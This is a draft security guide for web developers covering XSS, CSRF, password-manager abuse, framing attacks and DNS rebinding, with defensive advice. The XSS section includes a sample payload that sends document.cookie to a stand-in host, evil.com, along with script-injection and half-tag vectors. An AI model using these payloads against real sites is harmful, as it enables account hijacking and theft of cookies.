Security tips for web developers

This page describes some things that web developers need to know about web browsers in order to create sites that don't have security holes.

This is still a draft, as you might be able to guess from the number of "TODO:" items and the poor separation of opinion from fact.

Cross-site scripting (XSS)
Password fields in user-submitted HTML
Cross-site request forgery (CSRF)
Other common holes
Should I disable password manager?
Sites used at public computers
Intranet sites
Purely server-side holes

Cross-site scripting (XSS)

A cross-site scripting (XSS) hole is when an attacker can inject scripts into a page sent by your server. Browsers treat these injected scripts like any other script in the page.

For example, if http://www.yoursite.com/search?q=<script>alert(5)</script> returns "<p>There were no hits for <script>alert(5)</script>.</p>", your site is vulnerable to a simple XSS hole. If a malicious site links to such a URL, it can take control over the user's account on the site in several ways:

Steal cookies for that site (location = "http://evil.com/stealcookie.cgi?cookie=" + encodeURIComponent(document.cookie)).
Steal passwords for that site that are stored by the browser, or that users are willing to enter after checking that they are on the correct site.
Read the user's data on the site or act on behalf of the user using iframes and DOM.
Set up an interactive session for the attacker to control the user's account, using the user's browser as a proxy, as long as the user doesn't leave the page. (This defeats any security-by-obscurity you might have.)
If the site has another XSS hole that can be exploited through a cookie, a normal XSS hole can be used to set a cookie, resulting in a permanent attack.

Internet Explorer supports a non-standard extension to HTTP cookies called HttpOnly. HttpOnly guards against the first version of XSS attacks, but only the first version (except in some clever cases involving multiple subdomains). Because of this, and because Firefox does not support HttpOnly (bug 178993), you should not rely on HttpOnly to protect your site and visitors.

Even on sites where users do not have accounts, XSS holes can be a problem. For example, intranet sites are automatically limited to users within the intranet, but XSS holes can allow outsiders to access them through the web browsers of employees.

Avoiding XSS holes

"Open redirect" scripts should not redirect to URLs with special protocols that inherit the security context of the site (hi Gmail). In Firefox, these protocols are javascript: and data:.

For sites where the input is meant to be plain text, the fix is simple: escape everything as it is output as HTML, using an escaping mechanism appropriate to where it is.

Text in HTML and HTML attributes: escape & < > " ' as & < > " '
Text in JavaScript strings: escape \ / ' " as \\ \/ \' \". (It is not immediately obvious why you must escape / as \/. The reason is not because of how JavaScript is parsed, but because of how HTML is parsed. HTML parsers in web browsers interpret any </script> as the close of a <script> tag.)

Your choice of server-side libraries may affect how easy it is to get this right. If your HTML generation is based on concatenating strings and calling functions to escape variables that might contain certain characters, security depends on "remembering to escape" every variable. One alternative is to use an API where you're constructing a DOM tree out of elements and text nodes. Another is to use an API where you're opening tags, giving them attributes, closing tags, and outputting text. If implemented well, these abstractions might make server-side programming easier and improve a site's speed in addition to making the code less error-prone.

To be safe from XSS, sites should also specify the character set of every page. Browsers use all kinds of crazy heuristics to determine the character set when it is not specified, and the inputs to the heuristics are more or less control of an attacker. For example, browsers may take the character set of the linking page, byte distributions within the page, and the user's language into account. Some character sets (such as UTF-7) have ways of representing the < character without using the byte corresponding to that character in ASCII, which can lead to XSS if a browser thinks your site is UTF-7.

Avoiding XSS holes in sites that allow HTML

For sites where users are allowed to use HTML, the goal is not to escape the input, but to restrict what HTML features can be used.

The level of restriction depends on the site. A site like MySpace may decide to let users customize the appearance of their pages as much as they want. In contrast, a forum will probably limit users to P, BLOCKQUOTE, lists, simple inline styles, and perhaps images.

The naive approach of "stripping tags" using regular expressions often misses things because it interprets them differently than browsers do. For example, the regular expression <.*?> matches nothing in "<script src='http://evil.com/evil.js' </script", leaving your Internet Explorer and Firefox visitors vulnerable (see bug 226495 and for details about "half-tag" parsing). Gerv has an example involving unterminated entities. RSnake maintains an extensive list of XSS vectors that naive filtering may miss.

TODO: go through RSnake's list and make sure my advice covers everything.

The best approach is to parse the input HTML on the server, keeping only tags, attributes, and attribute values you want to allow. Upon serialization, the result will be "well-formed" HTML that browsers will parse the same way your server did.

Things you should ensure are never allowed in user-submitted HTML, to protect the accounts of visitors who use Firefox and IE:

javascript:, vbscript:, and data: URLs in links, images, anywhere.
<script> tags, with or without src attributes.
Event attributes (on*), which contain scripts.
-moz-binding: or behavior: CSS properties inside <style> elements or style attributes.
HTML is that is not "well-formed" -- you can't be sure how quirky browsers will parse it. (Example: <b <i>Foo)

The above list might not be complete and it is safer to use whitelists than blacklists. For example, only allow http:, https:, and ftp: links rather than allowing all links other than javascript:, vbscript:, and data:.

If you must allow unsanitized, untrusted HTML to be part of your site, ensure that those pages are not on the same hostname as where other users log in. (webmail, web hosts, attachments in a bug-tracking system, Google cache) (see Gerv's proposal)

TODO: test various browsers' interpretation of setting "document.domain" to figure out exactly what "not on the same hostname" needs to mean

Content other than HTML and XSS

If you serve untrusted content as text/plain, be aware that some browsers will ignore the mime type (violating the HTTP spec) and treat it as something other than text/plain. Internet Explorer notoriously treats text/plain content as HTML if it contains anything that looks like a tag, and even Firefox does some sniffing if some of the bytes would be "control characters" in ASCII. The best solution is to treat untrusted text/plain in the same way as untrusted text/html that cannot be modified: serve it from a different hostname.

TODO: find out whether this warning should also apply to application/octet-stream or other mime types.

TODO: find out what the possible results of Firefox's sniffing are. Can it result in treating the content as text/html, or only as something to be downloaded?

Password fields in user-submitted HTML

Web sites should not allow users to put up forms with <input type="password">. Password managers may fill in the password, thinking the form is a legitimate part of the site.

You can probably check the "type" attribute for "input" elements against your whitelist at the same time you filter for XSS.

The exact likelihood that such an attack will succeed depends on the browser used. Firefox and Safari fill in passwords automatically. IE fills in passwords if the user types his username (imagine a form that says "Type your username to find out your Star Wars name!") or double-clicks the username field and then clicks right below it. Opera fills in passwords if the user clicks the wand icon on the toolbar. Even with Opera, users probably aren't as careful with activating the password manager as they would be when actually typing their password, since password manager does defend against ordinary phishing.

This attack was first used in November 2006 against MySpace, which has since fixed their site. Firefox and Safari developers are trying to determine whether they can mitigate the problem for sites that remain vulnerable, hopefully without crippling password management features and thus making users more vulnerable to actual phishing. (See bug 360493.)

Cross-site request forgery (CSRF)

A Cross-site request forgery hole is when a malicious site can cause a visitor's browser to make a request to your server that causes a change on the server. The server thinks that because the request comes with the user's cookies, the user wanted to submit that form.

Depending on which forms on your site are vulnerable, an attacker might be able to do the following to your victims:

Log the victim out of your site. (On some sites, "Log out" is a link rather than a button!)
Change the victim's site preferences on your site. (Example: Google)
Post a comment on your site using the victim's login.
Transfer funds to another user's account.

Attacks can also be based on the victim's IP address rather than cookies:

Post an anonymous comment that is shown as coming from the victim's IP address.
Modify settings on a device such as a wireless router or cable modem.
Modify an intranet wiki page.
Perform a distributed password-guessing attack without a botnet. (This assumes they have a way to tell whether the login succeeded, perhaps by submitting a second form that isn't protected against CSRF.)

CSRF attacks usually involve JavaScript to submit the cross-site form automatically. It is possible for a malicious site to make a user submit a form to another site even without JavaScript, however: form fields can be hidden and buttons can be disguised as links or scrollbars.

Preventing CSRF

Make sure form submissions that cause server-side changes use your own forms. There are two ways you can do this:

Check the referrer header. If it is not present, or if it does not show the correct URL as the referrer, reject the submission. This has the advantage of being simple and sane, but the disadvantage that users who have told their browsers to omit the referrer header (out of concern for privacy) or lie about the referrer (in order to gain access to porn sites that use the referrer for the wrong purpose) will have trouble. This strategy doesn't work if the form uses GET and the page can contain user-generated content with links.
Include a hidden field in the form and check its value when the form is submitted. A simple scheme is to use an MD5 hash of the login cookie, some information about the form, and a secret on the server. Another possibility is to use a randomly generated one-time key for every form you serve, assuming you have a sufficiently unpredictable source of random numbers. This has the disadvantage of making it unsafe for users to save the HTML for forms and upload them to, say, bug databases.

Since so few sites protect their visitors against CSRF attacks, browser makers have discussed possible client-side fixes for CSRF. We didn't come up with anything good. For reference, see bug 38933, bug 40132, bug 246476, and bug 246519. At most, browsers might be able to prevent CSRFs from web sites to intranet sites, but not between web sites.

Other common holes

Don't put private user data or restricted-access data in JavaScript files whose URLs can be guessed. JavaScript files can be included from sites in other domains, and they will be executed on the attacker's domain. The only thing keeping most HTML and text files from being read this way is that they result in JavaScript syntax errors. One way to avoid this kind of hole is to serve HTML files containing scripts (to be loaded in hidden iframes) rather than naked scripts.

Example: Bugzilla was vulnerable for a short time when it allowed bug lists to be returned in a JavaScript format (bug 195530. While bug lists do not contain user data, they sometimes include information about restricted-access bug reports.
Example: An early version of Gmail served contact lists as an array literal. Even through the array was not referenced, it was possible to determine the contents of the array by overriding the Array constructor.

Don't load an untrusted site in a frame. The site will be able to load data into other frames, leading to a spoofing attack. If you visitors use Internet Explorer, don't use frames at all, because other sites can replace your site's frames. See bug 246448 for more information.

Don't put passwords (or any data that should remain private) in a URL if the page at that URL contains external links. When users click those links, the entire URL is sent as a referrer. https sites are not safe, because links to other https sites include the full referrer.

If your site is http://www.amazon.co.uk/, your server should ignore cookies that are set for all of co.uk. This is difficult if you use cookies in client-side JavaScript, but it can be done. Future versions of Firefox will disallow setting cookies for all of "co.uk" the same way it disallows setting cookies for all of "com" (bug 252342).

If your page is designed to be displayed as an iframe on other sites, you may want specify a background color. If your page is displayed in an <iframe> and does not specify a background color, the background will be transparent, not white (bug 154957).

Even if you protect against traditional CSRF attacks, malicious sites can make users click parts of your site without realizing it. Examples of attacks include sub-reaction-time page changes, pages that load your site in an iframe and cover all but an 8px-by-8px portion of the iframe, and pages that load your site in a 99% transparent iframe. Removing "One-click purchase" buttons helps, but only a little. One possible solution to the attacks involving iframes is to add a script that detects when the page is loaded in a frame and prevents form posting. (This solution should not be confused with the classical "break out of frames" script; it needs to be faster than that.)

If you echo site-relative URLs, be careful not to echo "relative" URLs starting with //. These are interpreted as being relative to the protocol rather than relative to the site. Bugzilla once had a bug where the login form could be made to submit off-site: bug 325079.

Should I disable password manager?

Financial sites such as banks frequently decide to disable password manager using the autocomplete="off" attribute. I'm not sure why they do this; it seems to me that it hurts security more than it helps:

Advantages of letting users save passwords:

Users are more likely to choose passwords that are hard to guess or brute-force rather than easy to remember and type.
If the user encounters a phishing site, they're more likely to notice that something is wrong, since they're not used to having to enter their password.

Disadvantages of letting users save passwords:

A stolen laptop or a computer sold on eBay is more likely to contain a saved password.

Sites used at public computers

After users log out, encourage them to close the browser window.

To prevent the back button from reaching private pages after the use has logged out of your site (but not closed the window), use cache-control. This will piss off your users, because it prevents the browser from going Back quickly and makes some browsers forget form information upon going Back. Note that the titles of pages in session history will still be visible in the Back button drop-down.

For sites that are frequently used at public computers, consider tying the autocomplete attribute to the checkbox in your login form that controls cookie lifetime. (This checkbox is often labeled "Remember me on this computer" or "Don't ask me for my password for 2 weeks"). For example, a script might set the autocomplete attribute to "off" if the password field has received a keypress and the checkbox is unchecked. That way, users at (misconfigured) public computers are unlikely to accidentally save their passwords on the public computer, while home users will be able to use password manager.

Intranet sites

Be aware that the DNS protocol allows bogus.attacker.com to resolve to an attacker's IP one minute and your server's IP the next. The "Princeton attack" takes advantage of this and has the same security impact as XSS. Intranet servers should check the Host header and return "400 Bad Request" if an unrecognized hostname is given, as the HTTP spec suggests but does not require. In addition, intranet firewalls should prevent DNS requests on external hostnames from resolving to internal IP addresses. Similarly, browsers, operating systems, and ISPs should all prevent external hostnames from resolving to 127.0.0.1. (Firefox briefly tried to work around Princeton attacks by caching DNS responses for longer than allowed by the DNS protocol; see bug 149943. It no longer does this; see bug 162871, bug 174590, bug 205726, and 223861.)

Maintainers of intranet sites should not neglect other security considerations, such as XSS, CSRF, and SQL injection. Firewalls do not prevent malicious sites loaded in users' browsers from trying XSS attacks.

Purely server-side holes

Some security holes in web sites don't involve web browsers at all and are therefore out of scope for this page. Examples include directory traversal, buffer overflows, SQL injection, and forgetting to apply form access controls to both the page with the form and the code that handles the form. The Web Application Security Consortium's Threat Classification enumerates common server-side holes.